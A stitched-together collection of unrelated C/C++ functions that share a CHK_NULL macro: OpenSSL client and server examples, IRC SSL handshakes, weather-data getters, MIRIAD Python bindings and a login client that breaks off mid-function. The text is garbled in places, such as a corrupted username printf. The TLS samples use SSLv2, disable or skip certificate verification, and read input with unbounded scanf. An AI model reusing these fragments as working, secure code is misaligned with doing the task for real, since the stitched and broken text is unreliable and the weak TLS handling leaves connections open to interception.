int
openhost(char *host, int port)
{
struct hostent *hp;
register int s;
struct sockaddr_in sin;
int err;
X509 *server_cert;
char *str;
if ((hp = gethostbyname(host)) == NULL) {
printf("ERR: gethostbyname\n");
return (-1);
}
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket");
return (-1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
bcopy(hp->h_addr, &sin.sin_addr, hp->h_length);
alarm(30);
if (connect(s, (struct sockaddr *) &sin, sizeof(sin)) < 0)
return (-1);
alarm(0);
SSLeay_add_ssl_algorithms();
SSL_load_error_strings();
/* ctx = SSL_CTX_new (SSLv23_method()); CHK_NULL(ctx);
*/
ctx = SSL_CTX_new(SSLv2_method());
CHK_NULL(ctx);
ssl = SSL_new(ctx);
CHK_NULL(ssl);
SSL_set_fd(ssl, s);
err = SSL_connect(ssl);
CHK_SSL(err);
printf("SSL connection using %s\n", SSL_get_cipher(ssl));
server_cert = SSL_get_peer_certificate(ssl);
CHK_NULL(server_cert);
printf("Server certificate:\n");
str = X509_NAME_oneline(X509_get_subject_name(server_cert), NULL, 0);
CHK_NULL(str);
printf("\t subject: %s\n", str);
Free(str);
str = X509_NAME_oneline(X509_get_issuer_name(server_cert), NULL, 0);
CHK_NULL(str);
printf("\t issuer: %s\n", str);
Free(str);
X509_free(server_cert);
return (s);
}
int ssl_client_handshake(struct Client *cptr) {
char *str;
int err;
cptr->ssl = (struct SSL*)SSL_new (ctx); CHK_NULL(cptr->ssl);
SSL_set_fd ((SSL*)cptr->ssl, cptr->fd);
set_blocking(cptr->fd);
err = SSL_connect ((SSL*)cptr->ssl);
set_non_blocking(cptr->fd);
if ((err)==-1) {
irclog(L_NOTICE,"Could connect to %s:Error in SSL_connect()",
get_client_name(cptr, TRUE));
return 0;
}
/* Following two steps are optional and not required for
data exchange to be successful. */
/* Get the cipher - opt */
set_blocking(cptr->fd);
irclog (L_NOTICE,"SSL connection using %s", SSL_get_cipher ((SSL*)cptr->ssl));
SetSecure(cptr);
/* Get server's certificate (note: beware of dynamic allocation) - opt */
cptr->client_cert = (struct X509*)SSL_get_peer_certificate ((SSL *)cptr->ssl);
set_non_blocking(cptr->fd);
if (cptr->client_cert != NULL)
{
irclog (L_NOTICE,"Server certificate:");
str = X509_NAME_oneline (X509_get_subject_name ((X509*)cptr->client_cert),0,0);
CHK_NULL(str);
irclog (L_NOTICE, "\t subject: %s", str);
// Free (str);
free (str);
str = X509_NAME_oneline (X509_get_issuer_name ((X509*)cptr->client_cert),0,0);
CHK_NULL(str);
irclog (L_NOTICE, "\t issuer: %s", str);
// Free (str);
free (str);
/* We could do all sorts of certificate verification stuff here before
deallocating the certificate. */
X509_free ((X509*)cptr->client_cert);
}
else
irclog (L_NOTICE, "Server does not have certificate.");
return 1;
}
static gchar *
get_data_wind (xml_wind *data,
datas_wind type)
{
gchar *str = NULL;
if (!data)
{
//DBG ("get_data_wind: xml-wind not present");
return EMPTY_STRING;
}
//DBG ("starting");
switch(type)
{
case _WIND_SPEED: str = data->s; break;
case _WIND_GUST: str = data->gust; break;
case _WIND_DIRECTION: str = data->t; break;
case _WIND_TRANS: str = data->d; break;
}
//DBG ("print %p", data->d);
//DBG ("%s", str);
return CHK_NULL(str);
}
/* -- This is not the same as the previous functions */
static gchar *
get_data_cc (xml_cc *data,
datas type)
{
gchar *str = NULL;
if (!data)
{
//DBG ("get_data_cc: xml-cc not present");
return EMPTY_STRING;
}
switch(type)
{
case LSUP: str = data->lsup; break;
case OBST: str = data->obst; break;
case FLIK: str = data->flik; break;
case TRANS: str = data->t; break;
case TEMP: str = data->tmp; break;
case HMID: str = data->hmid; break;
case VIS: str = data->vis; break;
case UV_INDEX: return get_data_uv(data->uv, _UV_INDEX);
case UV_TRANS: return get_data_uv(data->uv, _UV_TRANS);
case WIND_SPEED: return get_data_wind(data->wind, _WIND_SPEED);
case WIND_GUST: return get_data_wind(data->wind, _WIND_GUST);
case WIND_DIRECTION: return get_data_wind(data->wind, _WIND_DIRECTION);
case WIND_TRANS: return get_data_wind(data->wind, _WIND_TRANS);
case BAR_R: return get_data_bar(data->bar, _BAR_R);
case BAR_D: return get_data_bar(data->bar, _BAR_D);
case DEWP: str = data->dewp; break;
case WICON: str = data->icon; break;
}
return CHK_NULL(str);
}
/* rdvr is responsible for reading variables of all types. It wraps the
* output of uvgetvr_c into various python structures, and returns
* arrays as numpy arrays. */
PyObject * UVObject_rdvr(UVObject *self, PyObject *args) {
char *name, *type, value[MAXVAR];
int length, updated;
npy_intp dims[1];
PyArrayObject *rv;
if (!PyArg_ParseTuple(args, "ss", &name, &type)) return NULL;
uvprobvr_c(self->tno, name, value, &length, &updated);
dims[0] = length;
try {
switch (type[0]) {
case 'a':
uvgetvr_c(self->tno,H_BYTE,name,value,length+1);
return PyString_FromStringAndSize(value, length);
case 'j':
uvgetvr_c(self->tno,H_INT2,name,value,length);
if (length == 1)
return PyInt_FromLong((long) ((short *)value)[0]);
rv = (PyArrayObject *) PyArray_SimpleNew(1, dims, PyArray_INT);
CHK_NULL(rv);
for (int i=0; i < length; i++)
IND1(rv,i,int) = ((short *)value)[i];
return PyArray_Return(rv);
case 'i':
RET_IA(H_INT,PyInt_FromLong,long,int,PyArray_INT);
case 'r':
RET_IA(H_REAL,PyFloat_FromDouble,double,float,PyArray_FLOAT);
case 'd':
RET_IA(H_DBLE,PyFloat_FromDouble,double,double,PyArray_DOUBLE);
case 'c':
if (length == 1) {
uvgetvr_c(self->tno,H_CMPLX,name,value,length);
return PyComplex_FromDoubles(((double *)value)[0],
((double *)value)[1]);
}
rv = (PyArrayObject *) PyArray_SimpleNew(1,dims,PyArray_CDOUBLE);
CHK_NULL(rv);
uvgetvr_c(self->tno,H_CMPLX,name,(char *)rv->data,length);
return PyArray_Return(rv);
default:
PyErr_Format(PyExc_ValueError,"unknown var type: %c",type[0]);
return NULL;
}
} catch (MiriadError &e) {
PyErr_Format(PyExc_RuntimeError, e.get_message());
return NULL;
}
}
/* Wrapper over uvread_c to deal with numpy arrays, conversion of baseline
* and polarization codes, and returning a tuple of all results.
*/
PyObject * UVObject_read(UVObject *self, PyObject *args) {
PyArrayObject *data, *flags, *uvw;
PyObject *rv;
int nread, n2read, i, j;
double preamble[PREAMBLE_SIZE];
if (!PyArg_ParseTuple(args, "i", &n2read)) return NULL;
// Make numpy arrays to hold the results
npy_intp data_dims[1] = {n2read};
data = (PyArrayObject *) PyArray_SimpleNew(1, data_dims, PyArray_CFLOAT);
CHK_NULL(data);
flags = (PyArrayObject *) PyArray_SimpleNew(1, data_dims, PyArray_INT);
CHK_NULL(flags);
while (1) {
// Here is the MIRIAD call
try {
uvread_c(self->tno, preamble,
(float *)data->data, (int *)flags->data, n2read, &nread);
} catch (MiriadError &e) {
PyErr_Format(PyExc_RuntimeError, e.get_message());
return NULL;
}
if (preamble[3] != self->curtime) {
self->intcnt += 1;
self->curtime = preamble[3];
}
if ((self->intcnt-self->decphase) % self->decimate == 0 || nread==0) {
break;
}
}
// Now we build a return value of ((uvw,t,(i,j)), data, flags, nread)
npy_intp uvw_dims[1] = {3};
uvw = (PyArrayObject *) PyArray_SimpleNew(1, uvw_dims, PyArray_DOUBLE);
CHK_NULL(uvw);
IND1(uvw,0,double) = preamble[0];
IND1(uvw,1,double) = preamble[1];
IND1(uvw,2,double) = preamble[2];
i = GETI(preamble[4]);
j = GETJ(preamble[4]);
rv = Py_BuildValue("((Od(ii))OOi)",
(PyObject *)uvw, preamble[3], i, j,
(PyObject *)data, (PyObject *)flags, nread);
CHK_NULL(rv);
Py_DECREF(uvw); Py_DECREF(data); Py_DECREF(flags);
return rv;
}
int ActionSet::init(char *filename){
FILE *fp=fopen(filename,"r");
CHK_NULL(fp,"ActionSet: could not open file\n");
char buf[BUF_LEN];
fgets(buf,BUF_LEN,fp);//skip first line
while(!feof(fp)){
if(NULL==fgets(buf,BUF_LEN,fp))
break;
if(*buf=='0')
break;
Action tmp(buf);
//m_Data.push_back(tmp);
m_Data.insert(make_pair(tmp.getfromId(),tmp));
}
fclose(fp);
return 0;
}
static gchar *
get_data_uv (xml_uv *data,
datas_uv type)
{
gchar *str = NULL;
if (!data)
{
//DBG ("get_data_bar: xml-uv not present");
return EMPTY_STRING;
}
switch(type)
{
case _UV_INDEX: str = data->i; break;
case _UV_TRANS: str = data->t; break;
}
return CHK_NULL(str);
}
static gchar *
get_data_bar (xml_bar *data,
datas_bar type)
{
gchar *str = NULL;
if (!data)
{
//DBG ("get_data_bar: xml-wind not present");
return EMPTY_STRING;
}
switch(type)
{
case _BAR_R: str = data->r; break;
case _BAR_D: str = data->d; break;
}
return CHK_NULL(str);
}
static gchar *
get_data_loc (xml_loc *data,
datas_loc type)
{
gchar *str = NULL;
if (!data)
{
//DBG ("get_data_loc: xml-loc not present");
return EMPTY_STRING;
}
switch(type)
{
case DNAM: str = data->dnam; break;
case SUNR: str = data->sunr; break;
case SUNS: str = data->suns; break;
}
return CHK_NULL(str);
}
int ssl_handshake(struct Client *cptr) {
char *str;
int err;
cptr->ssl = (struct SSL*) SSL_new (ctx);
// cptr->use_ssl=1;
CHK_NULL (cptr->ssl);
SSL_set_fd ((SSL *)cptr->ssl, cptr->fd);
set_non_blocking(cptr->fd);
err = ircd_SSL_accept (cptr, cptr->fd);
if ((err)==-1) {
irclog(L_ERROR,"Lost connection to %s:Error in SSL_accept()",
get_client_name(cptr, TRUE));
SSL_shutdown((SSL *)cptr->ssl);
SSL_free((SSL *)cptr->ssl);
cptr->ssl = NULL;
return 0;
}
/* Get the cipher - opt */
SetSecure(cptr);
irclog (L_DEBUG, "SSL connection using %s", SSL_get_cipher ((SSL *)cptr->ssl));
/* Get client's certificate (note: beware of dynamic
* allocation) - opt */
cptr->client_cert = (struct X509*)SSL_get_peer_certificate ((SSL *)cptr->ssl);
if (cptr->client_cert != NULL)
{
irclog (L_DEBUG,"Client certificate:");
str = X509_NAME_oneline (X509_get_subject_name ((X509*)cptr->client_cert), 0, 0);
CHK_NULL (str);
irclog (L_DEBUG, "\t subject: %s", str);
// Bejvavalo
// Free (str);
free(str);
str = X509_NAME_oneline (X509_get_issuer_name ((X509*)cptr->client_cert), 0, 0);
CHK_NULL (str);
irclog (L_DEBUG, "\t issuer: %s", str);
// Bejvavalo
// Free (str);
free(str);
/* We could do all sorts of certificate
* verification stuff here before
* deallocating the certificate. */
X509_free ((X509*)cptr->client_cert);
}
else
irclog (L_DEBUG, "Client does not have certificate.");
return 1;
}
void main ()
{
int err;
SSL_CTX* ctx;
SSL* ssl;
X509* client_cert;
char* str;
char buf [4096];
FILE* log;
log = fopen ("/dev/console", "a"); CHK_NULL(log);
fprintf (log, "inetdserv %ld\n", (long)getpid());
SSL_load_error_strings();
ctx = SSL_CTX_new (); CHK_NULL(ctx);
err = SSL_CTX_use_RSAPrivateKey_file (ctx, KEYF, SSL_FILETYPE_PEM);
CHK_SSL (err);
err = SSL_CTX_use_certificate_file (ctx, CERTF, SSL_FILETYPE_PEM);
CHK_SSL (err);
/* inetd has already opened the TCP connection, so we can get right
down to business. */
ssl = SSL_new (ctx); CHK_NULL(ssl);
SSL_set_fd (ssl, fileno(stdin));
err = SSL_accept (ssl); CHK_SSL(err);
/* Get the cipher - opt */
fprintf (log, "SSL connection using %s\n", SSL_get_cipher (ssl));
/* Get client's certificate (note: beware of dynamic allocation) - opt */
client_cert = SSL_get_peer_certificate (ssl);
if (client_cert != NULL) {
fprintf (log, "Client certificate:\n");
str = X509_NAME_oneline (X509_get_subject_name (client_cert));
CHK_NULL(str);
fprintf (log, "\t subject: %s\n", str);
OPENSSL_free (str);
str = X509_NAME_oneline (X509_get_issuer_name (client_cert));
CHK_NULL(str);
fprintf (log, "\t issuer: %s\n", str);
OPENSSL_free (str);
/* We could do all sorts of certificate verification stuff here before
deallocating the certificate. */
X509_free (client_cert);
} else
fprintf (log, "Client doe not have certificate.\n");
/* ------------------------------------------------- */
/* DATA EXCHANGE: Receive message and send reply */
err = SSL_read (ssl, buf, sizeof(buf) - 1); CHK_SSL(err);
buf[err] = '\0';
fprintf (log, "Got %d chars:'%s'\n", err, buf);
err = SSL_write (ssl, "Loud and clear.", strlen("Loud and clear."));
CHK_SSL(err);
/* Clean up. */
fclose (log);
SSL_free (ssl);
SSL_CTX_free (ctx);
}
int main ()
{
int err;
int listen_sd;
int sd;
struct sockaddr_in sa_serv;
struct sockaddr_in sa_cli;
size_t client_len;
SSL_CTX* ctx;
SSL* ssl;
X509* client_cert;
char* str;
char buf [4096];
SSL_METHOD *meth;
int optval =1;
/* SSL preliminaries. We keep the certificate and key with the context. */
SSL_load_error_strings();
SSLeay_add_ssl_algorithms();
meth = SSLv23_server_method();
ctx = SSL_CTX_new (meth);
if (!ctx) {
ERR_print_errors_fp(stderr);
exit(2);
}
if (SSL_CTX_use_certificate_file(ctx, CERTF, SSL_FILETYPE_PEM) <= 0) {
ERR_print_errors_fp(stderr);
exit(3);
}
if (SSL_CTX_use_PrivateKey_file(ctx, KEYF, SSL_FILETYPE_PEM) <= 0) {
ERR_print_errors_fp(stderr);
exit(4);
}
if (!SSL_CTX_check_private_key(ctx)) {
fprintf(stderr,"Private key does not match the certificate public key\n");
exit(5);
}
/* ----------------------------------------------- */
/* Prepare TCP socket for receiving connections */
listen_sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(listen_sd, "socket");
memset (&sa_serv, '\0', sizeof(sa_serv));
sa_serv.sin_family = AF_INET;
sa_serv.sin_addr.s_addr = INADDR_ANY;
sa_serv.sin_port = htons (8889); /* Server Port number
*/
err = bind(listen_sd, (struct sockaddr*) &sa_serv,
sizeof (sa_serv)); CHK_ERR(err, "bind");
/* Receive a TCP connection. */
err = listen (listen_sd, 5); CHK_ERR(err, "listen");
client_len = sizeof(sa_cli);
sd = accept (listen_sd, (struct sockaddr*) &sa_cli, &client_len);
CHK_ERR(sd, "accept");
/* added by Carman Neustaedter, thanks to Hal & Darcy
Set address to be reusable.
int optval=1 was added above
1 means turn this option on
0 means turn this option off
SO_REUSEADDR specifies that we will toggle the feature of address reuse
*/
if (setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&optval, sizeof(optval)) <0)
{
perror("Error attempting to reuse address");
exit(0);
}
close (listen_sd);
printf ("\nIn server. Connection from %lx, port %x\n",
sa_cli.sin_addr.s_addr, sa_cli.sin_port);
/* ----------------------------------------------- */
/* TCP connection is ready. Do server side SSL. */
ssl = SSL_new (ctx); CHK_NULL(ssl);
SSL_set_fd (ssl, sd);
err = SSL_accept (ssl); CHK_SSL(err);
/* Get the cipher - opt */
printf ("In server. SSL connection using %s\n", SSL_get_cipher (ssl));
/* Get client's certificate (note: beware of dynamic allocation) - opt
client_cert = SSL_get_peer_certificate (ssl);
if (client_cert != NULL) {
printf ("Client certificate:\n");
str = X509_NAME_oneline (X509_get_subject_name (client_cert), 0, 0);
CHK_NULL(str);
printf ("\t subject: %s\n", str);
Free (str);
str = X509_NAME_oneline (X509_get_issuer_name (client_cert), 0, 0);
CHK_NULL(str);
printf ("\t issuer: %s\n", str);
Free (str);
We could do all sorts of certificate verification stuff here before
deallocating the certificate.
X509_free (client_cert);
} else
printf ("Client does not have certificate.\n");
DATA EXCHANGE - Receive message and send reply. */
err = SSL_read (ssl, buf, sizeof(buf) - 1);
printf("In server. Just after the first read\n\n");
CHK_SSL(err);
buf[err] = '\0';
printf ("GotGOT %d chars:'%s'\n", err, buf);
err = SSL_write (ssl, "I hear you!!.", strlen("I hear you!!."));
CHK_SSL(err);
/* Clean up. */
close (sd);
SSL_free (ssl);
SSL_CTX_free (ctx);
}
bool
str2bin( t_vtype type,
gchar * str,
gpointer value)
/*
* Opposite to the above really. Given a string, convert the contents
* into an object pointed to by 'value' which is assumed to be large
* enough to contain it. The exception is if it is of type string,
* where gpointer is assumed to be a pointer to a string (ie char **),
* whereupon it will be set to point to a duplicate (MALLOCed) of 'str'.
*/
{
CHK_NULL(value, FALSE);
switch(type)
{
case type_none:
E("Type set to 'none' - conversion not possible");
break;
case type_bool:
if(g_str_equal(str, TRUE_TEXT))
{
*(bool *)value = TRUE;
return TRUE;
}
if(g_str_equal(str, FALSE_TEXT))
{
*(bool *)value = FALSE;
return TRUE;
}
return FALSE;
case type_char:
*(gchar **)value = g_strdup(str);
break;
case type_short:
*(short *)value = (short)atoi(str);
return TRUE;
case type_int:
*(int *)value = atoi(str);
return TRUE;
case type_long:
*(long *)value = atol(str);
return TRUE;
case type_float:
*(float *)value = (float)atof(str);
return TRUE;
case type_double:
*(double *)value = atof(str);
return TRUE;
case type_string:
*(gchar **)value = g_strdup(str);
return TRUE;
case type_date: /* Date only dd/mm/yyyy */
*(time_t *)value = m_date2long(str);
return TRUE;
case type_time: /* Time only hh:mm:ss */
*(time_t *)value = m_time2long(str);
return TRUE;
case type_datetime: /* Both date & time */
*(time_t *)value = m_datetime2long(str);
return TRUE;
default:
E("Illegal or unknown conversion type (%d)", type);
}
return FALSE; /* Failed */
} /* str2bin() */
int main ()
{
int err;
int sd;
struct sockaddr_in sa;
SSL_CTX* ctx;
SSL* ssl;
X509* server_cert;
char* str;
char buf [4096];
SSL_METHOD *meth;
SSLeay_add_ssl_algorithms();
meth = SSLv23_client_method();
SSL_load_error_strings();
ctx = SSL_CTX_new (meth); CHK_NULL(ctx);
CHK_SSL(err);
SSL_CTX_set_verify(ctx,SSL_VERIFY_PEER,NULL);
SSL_CTX_load_verify_locations(ctx,CACERT,NULL);
if (SSL_CTX_use_certificate_file(ctx, CERTF, SSL_FILETYPE_PEM) <= 0) {
ERR_print_errors_fp(stderr);
exit(-2);
}
if (SSL_CTX_use_PrivateKey_file(ctx, KEYF, SSL_FILETYPE_PEM) <= 0) {
ERR_print_errors_fp(stderr);
exit(-3);
}
if (!SSL_CTX_check_private_key(ctx)) {
printf("Private key does not match the certificate public keyn");
exit(-4);
}
/* ----------------------------------------------- */
/* Create a socket and connect to server using normal socket calls. */
sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(sd, "socket");
memset (&sa, '\0', sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr ("127.0.0.1"); /* Server IP */
sa.sin_port = htons (1111); /* Server Port number */
err = connect(sd, (struct sockaddr*) &sa,
sizeof(sa)); CHK_ERR(err, "connect");
/* ----------------------------------------------- */
/* Now we have TCP conncetion. Start SSL negotiation. */
ssl = SSL_new (ctx); CHK_NULL(ssl);
SSL_set_fd (ssl, sd);
err = SSL_connect (ssl); CHK_SSL(err);
/* Following two steps are optional and not required for
data exchange to be successful. */
/* Get the cipher - opt */
printf ("SSL connection using %s\n", SSL_get_cipher (ssl));
/* Get server's certificate (note: beware of dynamic allocation) - opt */
server_cert = SSL_get_peer_certificate (ssl); CHK_NULL(server_cert);
printf ("Server certificate:\n");
str = X509_NAME_oneline (X509_get_subject_name (server_cert),0,0);
CHK_NULL(str);
printf ("\t subject: %s\n", str);
OPENSSL_free (str);
str = X509_NAME_oneline (X509_get_issuer_name (server_cert),0,0);
CHK_NULL(str);
printf ("\t issuer: %s\n", str);
OPENSSL_free (str);
/* We could do all sorts of certificate verification stuff here before
deallocating the certificate. */
X509_free (server_cert);
/* --------------------------------------------------- */
/* DATA EXCHANGE - Send a message and receive a reply. */
err = SSL_write (ssl, "Hello World!", strlen("Hello World!")); CHK_SSL(err);
err = SSL_read (ssl, buf, sizeof(buf) - 1); CHK_SSL(err);
buf[err] = '\0';
printf ("Got %d chars:'%s'\n", err, buf);
SSL_shutdown (ssl); /* send SSL/TLS close_notify */
/* Clean up. */
close (sd);
SSL_free (ssl);
SSL_CTX_free (ctx);
return 0;
}
void *thread_main (void *arg)
{
int s, AcceptSocket;
#ifdef _WIN32
WORD wVersionRequested;
WSADATA wsaData;
#endif /* */
struct sockaddr_in service;
int err;
size_t client_len;
SSL_CTX *ctx;
SSL *ssl;
X509 *client_cert;
char *str;
char buf[1024];
ssl = (SSL *) arg;
//取出socket
s = SSL_get_fd (ssl);
//接受SSL连接
err = SSL_accept (ssl);
if (err < 0)
{
printf ("ssl accerr\n");
return;
}
printf ("SSL connection using %s\n", SSL_get_cipher (ssl));
//检索证书
client_cert = SSL_get_peer_certificate (ssl);
if (client_cert != NULL)
{
printf ("Client certificate:\n");
//获得客户端证书subject并转变成字符型,以便进行打印
str = X509_NAME_oneline (X509_get_subject_name (client_cert), 0, 0);
CHK_NULL (str);
printf ("\t subject: %s\n", str);
OPENSSL_free (str);
//获得客户端证书issuer并转变成字符型,以便进行打印
str = X509_NAME_oneline (X509_get_issuer_name (client_cert), 0, 0);
CHK_NULL (str);
printf ("\t issuer: %s\n", str);
OPENSSL_free (str);
X509_free (client_cert);
}
else
printf ("Client does not have certificate.\n");
//进行安全会话
memset (buf, 0, 1024);
err = SSL_read (ssl, buf, sizeof (buf) - 1);
if (err < 0)
{
printf ("ssl read err\n");
close (s);
return;
}
printf ("get : %s\n", buf);
#if 0
buf[err] = '\0';
err = SSL_write (ssl, "I hear you.", strlen ("I hear you."));
#endif /* */
SSL_free (ssl);
close (s);
}
struct host_ret
openhost(char *host, int port, int dossl)
{
struct hostent *hp;
struct sockaddr_in sin;
struct host_ret ret;
#ifdef USE_SSLEAY
int err;
X509 *server_cert;
char *str;
#endif
ret.s = -1;
if ((hp = gethostbyname(host)) == NULL) {
fprintf(stderr, "ERR: gethostbyname: %s\n", host);
return (ret);
}
if ((ret.s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket");
return (ret);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
bcopy(hp->h_addr, &sin.sin_addr, hp->h_length);
alarm(30);
if (connect(ret.s, (struct sockaddr *) &sin, sizeof(sin)) < 0) {
close(ret.s);
ret.s = -1;
return (ret);
}
alarm(0);
#ifdef USE_SSLEAY
if (dossl) {
SSLeay_add_ssl_algorithms();
SSL_load_error_strings();
ret.ctx = SSL_CTX_new(SSLv2_method());
CHK_NULL(ret.ctx);
ret.ssl = SSL_new(ret.ctx);
CHK_NULL(ret.ssl);
SSL_set_fd(ret.ssl, ret.s);
err = SSL_connect(ret.ssl);
CHK_SSL(err);
server_cert = SSL_get_peer_certificate(ret.ssl);
CHK_NULL(server_cert);
str = X509_NAME_oneline(X509_get_subject_name(server_cert), NULL, 0);
CHK_NULL(str);
Free(str);
str = X509_NAME_oneline(X509_get_issuer_name(server_cert), NULL, 0);
CHK_NULL(str);
Free(str);
if (server_cert)
X509_free(server_cert);
}
#endif /* USE_SSLEAY */
return (ret);
}
status_t SSO::SSLSend(const char *host, HTTPFormatter *send, HTTPFormatter **recv) {
int err = B_OK;
int sd;
struct sockaddr_in sa;
struct hostent *hp;
SSL_CTX *ctx;
SSL *ssl;
char buffer[1024];
SSL_METHOD *meth;
SSL_load_error_strings();
SSLeay_add_ssl_algorithms();
meth = SSLv23_client_method();
ctx = SSL_CTX_new (meth);
CHK_NULL(ctx);
SSL_CTX_set_options(ctx, SSL_OP_ALL);
/* ----------------------------------------------- */
/* Create a socket and connect to server using normal socket calls. */
sd = socket (AF_INET, SOCK_STREAM, 0);
CHK_ERR(sd, "socket");
// clear sa
memset (&sa, '\0', sizeof(sa));
// get address
if ((hp= gethostbyname(host)) == NULL) {
sa.sin_addr.s_addr = inet_addr (host); /* Server IP */
} else {
memcpy((char *)&sa.sin_addr,hp->h_addr,hp->h_length); /* set address */
};
sa.sin_family = AF_INET;
sa.sin_port = htons(443); /* Server Port number */
err = connect(sd, (struct sockaddr*) &sa, sizeof(sa));
CHK_ERR(err, "connect");
/* ----------------------------------------------- */
/* Now we have TCP conncetion. Start SSL negotiation. */
ssl = SSL_new (ctx); CHK_NULL(ssl);
if (SSL_set_fd(ssl, sd) == 0) {
LOG(kProtocolName, liDebug, "C %lX: SSL Error setting fd", this);
return -1;
};
SSL_set_verify(ssl, SSL_VERIFY_NONE, NULL);
SSL_set_connect_state(ssl);
err = SSL_connect (ssl);
CHK_SSL(err);
/* --------------------------------------------------- */
/* DATA EXCHANGE - Send a message and receive a reply. */
err = SSL_write(ssl, send->Flatten(), send->Length());
CHK_SSL(err);
if (err <= 0) {
LOG(kProtocolName, liDebug, "C %lX: SSL Error writing. Err: %ld", this, SSL_get_error(ssl, err));
};
BString data;
int received = 0;
while (err > 0) {
err = SSL_read(ssl, buffer, sizeof(buffer));
CHK_SSL(err);
if (err > 0) {
received += err;
data.Append(buffer, err);
memset(buffer, 0, sizeof(buffer));
};
};
*recv = new HTTPFormatter(data.String(), data.Length());
LOG(kProtocolName, liDebug, "C %lX: Got %d chars", this, received);
SSL_shutdown (ssl); /* send SSL/TLS close_notify */
/* Clean up. */
close (sd);
SSL_free (ssl);
SSL_CTX_free (ctx);
return received;
};
int main ()
{
int err;
int listen_sd;
int sd;
struct sockaddr_in sa_serv;
struct sockaddr_in sa_cli;
socklen_t client_len;
SSL_CTX* ctx;
SSL* ssl;
X509* client_cert;
char* str;
char buf [4096];
const SSL_METHOD *meth;
/* SSL preliminaries. We keep the certificate and key with the context. */
SSL_load_error_strings();
OpenSSL_add_ssl_algorithms();
meth = TLSv1_method();
ctx = SSL_CTX_new (meth);
if (!ctx) {
ERR_print_errors_fp(stderr);
exit(2);
}
if (SSL_CTX_use_certificate_file(ctx, CERTF, SSL_FILETYPE_PEM) <= 0) {
ERR_print_errors_fp(stderr);
exit(3);
}
if (SSL_CTX_use_PrivateKey_file(ctx, KEYF, SSL_FILETYPE_PEM) <= 0) {
ERR_print_errors_fp(stderr);
exit(4);
}
if (!SSL_CTX_check_private_key(ctx)) {
fprintf(stderr,"Private key does not match the certificate public key\n");
exit(5);
}
/* ----------------------------------------------- */
/* Prepare TCP socket for receiving connections */
listen_sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(listen_sd, "socket");
memset(&sa_serv, 0, sizeof(sa_serv));
sa_serv.sin_family = AF_INET;
sa_serv.sin_addr.s_addr = INADDR_ANY;
sa_serv.sin_port = htons (1111); /* Server Port number */
err = bind(listen_sd, (struct sockaddr*) &sa_serv,
sizeof (sa_serv)); CHK_ERR(err, "bind");
/* Receive a TCP connection. */
err = listen (listen_sd, 5); CHK_ERR(err, "listen");
client_len = sizeof(sa_cli);
sd = accept (listen_sd, (struct sockaddr*) &sa_cli, &client_len);
CHK_ERR(sd, "accept");
close (listen_sd);
printf ("Connection from %lx, port %x\n",
sa_cli.sin_addr.s_addr, sa_cli.sin_port);
/* ----------------------------------------------- */
/* TCP connection is ready. Do server side SSL. */
ssl = SSL_new (ctx); CHK_NULL(ssl);
SSL_set_fd (ssl, sd);
err = SSL_accept (ssl); CHK_SSL(err);
/* Get the cipher - opt */
printf ("SSL connection using %s\n", SSL_get_cipher (ssl));
/* Get client's certificate (note: beware of dynamic allocation) - opt */
client_cert = SSL_get_peer_certificate (ssl);
if (client_cert != NULL) {
printf ("Client certificate:\n");
str = X509_NAME_oneline (X509_get_subject_name (client_cert), 0, 0);
CHK_NULL(str);
printf ("\t subject: %s\n", str);
OPENSSL_free (str);
str = X509_NAME_oneline (X509_get_issuer_name (client_cert), 0, 0);
CHK_NULL(str);
printf ("\t issuer: %s\n", str);
OPENSSL_free (str);
/* We could do all sorts of certificate verification stuff here before
deallocating the certificate. */
X509_free (client_cert);
} else
printf ("Client does not have certificate.\n");
/* DATA EXCHANGE - Receive message and send reply. */
err = SSL_read (ssl, buf, sizeof(buf) - 1); CHK_SSL(err);
buf[err] = '\0';
printf ("Got %d chars:'%s'\n", err, buf);
err = SSL_write (ssl, "I hear you.", strlen("I hear you.")); CHK_SSL(err);
/* Clean up. */
close (sd);
SSL_free (ssl);
SSL_CTX_free (ctx);
return 0;
}
/*********************parent process tcp connection use to manage************************/
void client_mgr(char *ip, int serverPort, int pipefd, int pid)
{
int flag = 0;
char *p;
char name[256], passwd[256];
char realName[512];
int err, fd, i;
struct sockaddr_in sa;
char buf[4096];
SSL_CTX* ctx;
SSL* ssl;
//create a TCP socket
fd = socket (AF_INET, SOCK_STREAM, 0);
CHK_ERR(fd, "socket");
memset (&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr(ip);
sa.sin_port = htons(serverPort);
//connect step
err = connect(fd, (struct sockaddr*) &sa, sizeof(sa));
CHK_ERR(err, "connect");
sleep(2);
puts("Please input the common name: ");
scanf("%s", realName);
setupCTX(&ctx);
//build SSL on the TCP connection
ssl = SSL_new(ctx);
CHK_NULL(ssl);
SSL_set_fd (ssl, fd);
err = SSL_connect(ssl);
CHK_SSL(err);
//check certificate
SSL_CTX_load_verify_locations(ctx, CACERT, NULL);
SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);
int result = SSL_get_verify_result(ssl);
if(result == X509_V_OK || result == X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN) {
printf("The certificate is valid.\n");
}
else {
printf("Invalid certificate %d\n", result);
exit(1);
}
X509* server_cert = SSL_get_peer_certificate(ssl);
CHK_NULL(server_cert);
char *str = X509_NAME_oneline(X509_get_subject_name(server_cert),0,0);
CHK_NULL(str);
OPENSSL_free(str);
str = X509_NAME_oneline(X509_get_issuer_name(server_cert),0,0);
CHK_NULL(str);
OPENSSL_free(str);
X509_NAME *xname = X509_get_subject_name(server_cert);
X509_NAME_get_text_by_NID(xname, NID_commonName, commonName, 512);
if( strcasecmp(commonName, realName) !=0 )
{
printf("commonName is wrong.\n");
exit(1);
}
printf("commonName is right.\n");
printf("Server authentication is successful.\n");
//release!
X509_free(server_cert);
sleep(2);
while(!flag)
{
//handle the login part
printf("username: "******"%s",name);
getchar();
//safe mode
set_disp_mode(STDIN_FILENO, 0);
getpasswd(passwd, sizeof(passwd));
p = passwd;
